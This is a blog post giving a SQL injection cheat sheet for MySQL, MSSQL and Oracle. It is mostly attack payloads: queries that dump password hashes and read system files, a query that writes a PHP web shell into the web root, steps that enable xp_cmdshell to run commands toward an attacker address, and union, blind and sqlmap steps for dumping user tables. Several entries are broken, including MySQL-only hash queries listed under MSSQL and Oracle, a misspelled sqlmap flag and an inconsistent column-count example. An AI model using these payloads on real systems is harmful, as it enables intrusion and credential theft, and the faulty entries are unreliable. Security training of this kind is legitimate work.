JA Jobyer Ahmed

SQL Injection Cheat Sheet

Sep 9, 2021 3 min read

On this page

Enumeration

Gather some juicy info to move to higher privileges

MySQL

Information SQL Query
Database Version select @@version
Current Database select database()
Get other databases name select schema_name from information_schema.schemata
Database User select user()select system_user()
Database user, password hashes select host, user, password from mysql.user
Tables Name select table_schema,table_name from information_schema.tablesselect table_name from information_schema.tables where table_schema='userdb'
Columns Name select table_name, column_name **from** information_schema.columns select column_name **from** information_schema.columns where table_name = 'usertable'
Read system Files select load_file('/etc/hosts')
Write to File select "<?php system($_GET['cmd']); ?>",2,3,4 into outfile '/var/www/html/legit.php'

MSSQL

Information SQL Query
Database Version select @@version;
Current Database select db_name();
Get available databases name select name from master..sysdatabases;
If DBA SELECT is_srvrolemember('sysadmin');
Database user, password hashes select host, user, password from mysql.user;
Tables Name select table_schema,table_name from information_schema.tables;select table_name from information_schema.tables where table_schema='userdb';
Columns Name select table_name, column_name **from** information_schema.columns; select column_name **from** information_schema.columns where table_name = 'usertable';
XP_CMDSHELL sp_configure 'show advanced options', 1;RECONFIGURE;GOsp_configure 'xp_cmdshell', 1;RECONFIGURE;GOEXEC xp_cmdshell 'ping attacker_ip'

Oracle

Information SQL Query
Database Version SELECT banner FROM v$version;SELECT version FROM v$instance;
Current Database SELECT SYS.DATABASE_NAME FROM DUAL;SELECT instance_name FROM V$INSTANCE;
Get available databases name SELECT DISTINCT owner FROM all_tables;
Get DBA Accounts SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';
Database user, password hashes select host, user, password from mysql.user;
Tables Name SELECT table_name FROM all_tables;SELECT table_name FROM all_tables WHERE owner='web_db';
Columns Name SELECT column_name FROM all_tab_columns WHERE table_name = 'users' and owner='web_db';

Exploitation

Understanding Manual attack is required instead of using a tool blindly. If we don’t understand manual attack then we won’t be able to find out why a tool not working and how to do it manually when required.

MySQL Error Based Manual Example

#Find how many columns
id=1 order by 1 #No Error
id=1 order by 2 #No Error
id=1 order by 3 #No Error
id=1 order by 1 # Error

#Find vulnerable column
id=1 union select null,2,3 #Error
id=1 union select 1,null,3 #### No Error

#Get Table name
id=1 union select 1,table_name,3 from information_schema.tables

#Get Columns name from a table
id=1 union select 1,column_name,3 from information_schema.columns where table_name = 'users'

#Get contents from columns
id=1 union select 1,concat(username,0x3a,password),3 FROM users

Bolean based Blind SQL Injection

#Verify
id=1 AND '1'='1 #Load Normally
id=1 AND '1'='2 #If the site vulnerable page won't load normally

#Check if the table name start with 'a'. If it is true page will load normally.
id=1 AND SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1) = a

id=1 AND SUBSTRING((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1) = b

SQLMAP

Sqlmap is a powerful popular tool to exploit sql injection. This tool can exploit All possible SQL Injection vulnerability.

#Capture the request using burp suite and save to a file called post.txt, then:
sqlmap -r post.txt --technique E --threads 5 --current-db --dmbs=mysql

#Find tables
sqlmap -r post.txt --technique E --threads 5 --dmbs=mysql -D database --tables

#Find Columns
sqlmap -r post.txt --technique E --threads 5 --dmbs=mysql -D database -T users --columns

#Dump contents
sqlmap -r post.txt --technique E --threads 5 --dmbs=mysql -D database -T Users --sql-query="select username,password from users"

Reference:

https://sqlwiki.netspi.com/attackQueries/informationGathering/

https://portswigger.net/web-security/sql-injection/cheat-sheet

Jobyer Ahmed
Written by
Jobyer Ahmed
Founder and Cybersecurity Professional
Jobyer Ahmed is the founder and cybersecurity professional at Bytium LLC. He works across offensive and defensive security, including penetration testing, red-team operations, and vulnerability management, with a focus on practical and audit-ready security improvements.
LinkedIn YouTube GitHub Twitter Email WhatsApp
PreviousA quick cheat sheet on Python NextSEH Stack Buffer Overflow